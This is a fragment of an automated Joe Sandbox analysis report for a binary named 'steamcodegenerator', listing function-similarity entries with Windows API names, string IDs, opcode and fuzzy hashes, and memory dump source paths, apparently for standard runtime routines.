                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocHeap
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4292702814-0
                                                                                                                          • Opcode ID: bd55b1ea0fc155a6d1c409fefb9d932666b1c806ec432e723f80dda1b82eeeb6
                                                                                                                          • Instruction ID: d44f6b1f9f80975c5a39c6213d8512bb2d847c8501cf5d077afefe13397ee335
                                                                                                                          • Opcode Fuzzy Hash: bd55b1ea0fc155a6d1c409fefb9d932666b1c806ec432e723f80dda1b82eeeb6
                                                                                                                          • Instruction Fuzzy Hash: F9F03A84F09E1645FA547EF15C422F4B1844F847B0FE85730D92E862C2DF2CA5488B30
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                          • String ID: s$s$,
                                                                                                                          • API String ID: 3215553584-728586918
                                                                                                                          • Opcode ID: 06cdfdd089d7f53002eee445f53705af94493326fe36f7a161390db78508ff4b
                                                                                                                          • Instruction ID: 46abc98327c525ef33b88d1fa6a75db0c280233d4e6630c0e3b85ade38c6da5f
                                                                                                                          • Opcode Fuzzy Hash: 06cdfdd089d7f53002eee445f53705af94493326fe36f7a161390db78508ff4b
                                                                                                                          • Instruction Fuzzy Hash: 70A22372F187C28BE7289FA4D8417FCB7A1FB44398FA05135DA4D57A84DB39A908CB50
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLastNameTranslate$CodeInfoLocalePageValidValue
                                                                                                                          • String ID: utf8
                                                                                                                          • API String ID: 3069159798-905460609
                                                                                                                          • Opcode ID: d4b3ff6ab2fd706453dd6c794e4175711012dd38f10e3c9d27665adbabbc73f4
                                                                                                                          • Instruction ID: bbc79f1b838dee1b061e37e24fdee45bd084f1ed04ab90514805f0b64603aa9f
                                                                                                                          • Opcode Fuzzy Hash: d4b3ff6ab2fd706453dd6c794e4175711012dd38f10e3c9d27665adbabbc73f4
                                                                                                                          • Instruction Fuzzy Hash: 21917F36A08B4681FB28AFA199432F9A394EF44FA0FA44131DB8C47785DF3CE5598761
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Value$Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2591520935-0
                                                                                                                          • Opcode ID: 9965b17ae3c4a17e3d0caa9ea39aea03ad22011a5320ec8fc02cfc6467b481ea
                                                                                                                          • Instruction ID: 0f1de3cda5b49d23e5af2653853ce601cb4e0db2b59d54a41e6b6ce4559bae17
                                                                                                                          • Opcode Fuzzy Hash: 9965b17ae3c4a17e3d0caa9ea39aea03ad22011a5320ec8fc02cfc6467b481ea
                                                                                                                          • Instruction Fuzzy Hash: 50718C22B04F0285FB18AFE0DC422F9A3A8AF44764FA54131CA8D13695EF3CA449CB60
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3140674995-0
                                                                                                                          • Opcode ID: 98028c3c7c245ce19bddfd2eddf14e9f2f0bacc6a8fa3fd2ff093612927a1805
                                                                                                                          • Instruction ID: defe5f08bde2d0f0728088e5be180fc8eafa7f523cbc0f52d2bd474dc7e2827c
                                                                                                                          • Opcode Fuzzy Hash: 98028c3c7c245ce19bddfd2eddf14e9f2f0bacc6a8fa3fd2ff093612927a1805
                                                                                                                          • Instruction Fuzzy Hash: 1E313B72608F8186EB64AFA0E8453F9B360FB85754F94443ADB8E47B94EF38D548C724
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1239891234-0
                                                                                                                          • Opcode ID: 8912553d44b3abefc55f9a8b3a26313e64a573415501656d81ef5f530cc03b7e
                                                                                                                          • Instruction ID: 88cf5564d008dba8d5d34bf0a0158319ff847d18a7e51947885580b5e9e207e2
                                                                                                                          • Opcode Fuzzy Hash: 8912553d44b3abefc55f9a8b3a26313e64a573415501656d81ef5f530cc03b7e
                                                                                                                          • Instruction Fuzzy Hash: 8D314C36608F8186DB649FA5EC452EAB3A4FB89768FA00135EB9D43B54DF38C549CB10
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                          • String ID: %$+
                                                                                                                          • API String ID: 3668304517-2626897407
                                                                                                                          • Opcode ID: 269d37533fdaf201db9261dc3333217303a5f80c2e6368c3b5d31c85d833f6b3
                                                                                                                          • Instruction ID: adc18bb4ef2b60d55f5a5ae0a588a37d1b849da52e96738d5151ab6695d4e9f9
                                                                                                                          • Opcode Fuzzy Hash: 269d37533fdaf201db9261dc3333217303a5f80c2e6368c3b5d31c85d833f6b3
                                                                                                                          • Instruction Fuzzy Hash: 02120522B18E858AFB25DBA4D8403FDA371AF55B98FA44131EF4D17A89DF3CD4498720
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2933794660-0
                                                                                                                          • Opcode ID: cabce6d9e3ae1a9f9b79acc04b8ec2d00ffbc707921c0ad921e752880e15d35e
                                                                                                                          • Instruction ID: 6ec8e1d1c3bc35d72a898fbe56e02dcb81d5aa32444396dbf2dc66feb6c6ec9e
                                                                                                                          • Opcode Fuzzy Hash: cabce6d9e3ae1a9f9b79acc04b8ec2d00ffbc707921c0ad921e752880e15d35e
                                                                                                                          • Instruction Fuzzy Hash: 2A114F22B14F068AEB009FA0EC452B873A4F719768F940D31DB6D42B54DF38D1588350
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                          • API String ID: 3215553584-2761157908
                                                                                                                          • Opcode ID: b2729346d47deeb60f377ee9dc525e25925e1ea60ab6d02c77dc29d9f41ed541
                                                                                                                          • Instruction ID: c077a36d12dab1c1494944a6728b6dfb0e036c3dcff8d5445b0f5b30a576ce53
                                                                                                                          • Opcode Fuzzy Hash: b2729346d47deeb60f377ee9dc525e25925e1ea60ab6d02c77dc29d9f41ed541
                                                                                                                          • Instruction Fuzzy Hash: 44713A63F18B4246E7699FE4C8427F9A291EB807B4FA18634DA5D46AC4DF3CF5488E10
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy_s
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1502251526-0
                                                                                                                          • Opcode ID: a3a34dc7f104a5757306e0e4006adbba08ef9a00a3e13a0073f806107d450ba3
                                                                                                                          • Instruction ID: 70a7b6e738fb1f70c2e1fb22e4f5f1f3340842550a1a60116ba5e0040d84078a
                                                                                                                          • Opcode Fuzzy Hash: a3a34dc7f104a5757306e0e4006adbba08ef9a00a3e13a0073f806107d450ba3
                                                                                                                          • Instruction Fuzzy Hash: 07C12772B18A9687DB24DFD9E4446AAF792F784B94F929134DB4E43744DB3CE804CB40
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InfoLocale$ErrorLastValue_invalid_parameter_noinfo
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1791019856-0
                                                                                                                          • Opcode ID: 4fcf00f24d458d487f226e0140c30a747feae87a0b699733a31c15bd732d9dab
                                                                                                                          • Instruction ID: bbc5cdd1c645ebec286f7846f5e6ae4acd84a003adb2031215410f24505b4db5
                                                                                                                          • Opcode Fuzzy Hash: 4fcf00f24d458d487f226e0140c30a747feae87a0b699733a31c15bd732d9dab
                                                                                                                          • Instruction Fuzzy Hash: F961C432B08A4286EB38BF95D9422F9B3A1FB54B60FA18135C79D43691DF3CE459CB50
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: -$e+000$gfff
                                                                                                                          • API String ID: 0-2620144452
                                                                                                                          • Opcode ID: 798b48c96635f930ac666b1b5a48e237ac275f191e21e12dc5bb9441e7330c16
                                                                                                                          • Instruction ID: 1222050bf170011d80dd3f5e8c9c558fc0bfaacfa4228a03174e5a923818856b
                                                                                                                          • Opcode Fuzzy Hash: 798b48c96635f930ac666b1b5a48e237ac275f191e21e12dc5bb9441e7330c16
                                                                                                                          • Instruction Fuzzy Hash: F4516B62B18AE646E7249E759C047E9B791E744BB4FA88231CB9C4BAC5CF3DD448C710
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InfoLocale
                                                                                                                          • String ID: GetLocaleInfoEx
                                                                                                                          • API String ID: 2299586839-2904428671
                                                                                                                          • Opcode ID: 415bcb294c056d98af3462750d7d188cc4b1afdd892eeae8a2ee088bcffb3ecf
                                                                                                                          • Instruction ID: 8ad971908ab7b9d2229f0dd57bd19d0fef5b3fecb0356122ea208ba287856ac3
                                                                                                                          • Opcode Fuzzy Hash: 415bcb294c056d98af3462750d7d188cc4b1afdd892eeae8a2ee088bcffb3ecf
                                                                                                                          • Instruction Fuzzy Hash: B7018421F08E5285EB44AF96A9014EAF360EF85FE4FA48035DE5D17B65CF3CD5498350
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Info
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1807457897-0
                                                                                                                          • Opcode ID: 5941f4e66f4a4ae4ea8d9f2ce51bef13bf4df362b0d1e962feb6320bd1209b36
                                                                                                                          • Instruction ID: f30a9985594d6336a33a68010fe39d4fad24b66a65594949da9318c98e29cf2e
                                                                                                                          • Opcode Fuzzy Hash: 5941f4e66f4a4ae4ea8d9f2ce51bef13bf4df362b0d1e962feb6320bd1209b36
                                                                                                                          • Instruction Fuzzy Hash: E912D132A08BD186E751DFA898442FDB7A4FB58758F968235EF9C43652DF38E198C310
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: ce188c6723de416a60445d936ccf2b71249bd4acdd477d6696f92839183b5057
                                                                                                                          • Instruction ID: 47353653827562dc05ccac1efd3cffabf752f4494b7b60054a9103ae38dc2060
                                                                                                                          • Opcode Fuzzy Hash: ce188c6723de416a60445d936ccf2b71249bd4acdd477d6696f92839183b5057
                                                                                                                          • Instruction Fuzzy Hash: FBE15D72B08B9186E720DBA1E8412EEB7A4F794798F904635DB8D53B56EF38D249C310
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: f8fdce93d0982d34daabacb749a03f63f2871ed28a5675a9677f348b7d655c88
                                                                                                                          • Instruction ID: a531d321e24873942173830172eca9b7ba960e826f1ca1daccd585952ceb760e
                                                                                                                          • Opcode Fuzzy Hash: f8fdce93d0982d34daabacb749a03f63f2871ed28a5675a9677f348b7d655c88
                                                                                                                          • Instruction Fuzzy Hash: 7551C725B04B9185FB24EBB2AC415FEBBA5AB407A8F644234EE9C27A95CF3CD505C710
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLastValue$InfoLocale
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 673564084-0
                                                                                                                          • Opcode ID: 4c183c7ee8845e7f1e29b7170d50f5209d966a7f82c8ce190a7d309a0b29ac7e
                                                                                                                          • Instruction ID: e85bbf34815c7bdced7990883c3bd13db948a7fe8ff78bad0bf92d0944420dec
                                                                                                                          • Opcode Fuzzy Hash: 4c183c7ee8845e7f1e29b7170d50f5209d966a7f82c8ce190a7d309a0b29ac7e
                                                                                                                          • Instruction Fuzzy Hash: D031C731B08B8282EB28ABA5E8423FEB3A0FB44750FD54134DB8D83645DF3CE4598B10
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00007FF71C06A298: GetLastError.KERNEL32 ref: 00007FF71C06A2A7
                                                                                                                            • Part of subcall function 00007FF71C06A298: FlsGetValue.KERNEL32 ref: 00007FF71C06A2BC
                                                                                                                            • Part of subcall function 00007FF71C06A298: SetLastError.KERNEL32 ref: 00007FF71C06A347
                                                                                                                          • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF71C074627,?,00000000,00000092,?,?,00000000,?,00007FF71C066B25), ref: 00007FF71C073ED6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast$EnumLocalesSystemValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3029459697-0
                                                                                                                          • Opcode ID: 01ec781091376c7859fee142802df2496de0f58f2f8dfee6d425d5d006462899
                                                                                                                          • Instruction ID: eadd39b11643b4673e069baee4e065ba2d5d2ec0cb7acd43e65bc0391a3c6ce1
                                                                                                                          • Opcode Fuzzy Hash: 01ec781091376c7859fee142802df2496de0f58f2f8dfee6d425d5d006462899
                                                                                                                          • Instruction Fuzzy Hash: 4111C363A08B458AEB19AF55D8426FDB7A0FB80FA0F949135C769432C0CB28D5D5C750
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00007FF71C06A298: GetLastError.KERNEL32 ref: 00007FF71C06A2A7
                                                                                                                            • Part of subcall function 00007FF71C06A298: FlsGetValue.KERNEL32 ref: 00007FF71C06A2BC
                                                                                                                            • Part of subcall function 00007FF71C06A298: SetLastError.KERNEL32 ref: 00007FF71C06A347
                                                                                                                          • GetLocaleInfoW.KERNEL32(?,?,?,00007FF71C07419A), ref: 00007FF71C074427
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast$InfoLocaleValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3796814847-0
                                                                                                                          • Opcode ID: 5447dec9b86e6f2ea6977062d9d6cdf6f0dba6f956cb56fba477a354d03ee583
                                                                                                                          • Instruction ID: a964cae68899813e80224cdddc45fff859923e34005a7acc3de3cfe32dd2497a
                                                                                                                          • Opcode Fuzzy Hash: 5447dec9b86e6f2ea6977062d9d6cdf6f0dba6f956cb56fba477a354d03ee583
                                                                                                                          • Instruction Fuzzy Hash: 97117D32F18F5243E73CABD5A8426BEA251EB44770FA54231D7AD036C4DF29E4959B10
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00007FF71C06A298: GetLastError.KERNEL32 ref: 00007FF71C06A2A7
                                                                                                                            • Part of subcall function 00007FF71C06A298: FlsGetValue.KERNEL32 ref: 00007FF71C06A2BC
